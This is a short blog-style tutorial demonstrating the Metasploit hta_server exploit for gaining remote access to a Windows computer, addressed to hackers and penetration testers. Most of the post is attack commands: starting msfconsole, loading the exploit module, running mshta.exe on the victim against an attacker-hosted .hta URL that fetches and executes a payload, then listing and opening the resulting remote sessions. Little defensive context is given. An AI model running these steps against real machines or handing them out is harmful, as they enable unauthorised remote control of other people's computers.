Today, I will give you a demo of the new Windows Hta_Server RCE exploit that allows hackers / penetration testers to have remote access to a windows computer. The exploit was publicly disclosed in late 2016 but was not noticed to the public eye till late 2018. It can be found and used easily by using Metasploit on a Kali-Linux distribution.
STEP 1:
Check your IP configuration (in this practical I have kept it on Bridge)
STEP 2:
Fire-up msfconsole in the kali terminal and search for hta_server
Commands:
service apache2 start
msfconsole
search HTA
use exploit/windows/misc/hta_server
Open powershell in windows and execute the following command (in your case different URL will be generated):
.\mshta.exe http://192.168.43.15:8080/Zhh7aIVVD.hta
As the command gets executed it will open up a session in msfconsole.
You can view the session using the following command:
sessions -l
and then see the ID value and type the following command to interact:
sessions -i <ID>
Comments
Post a Comment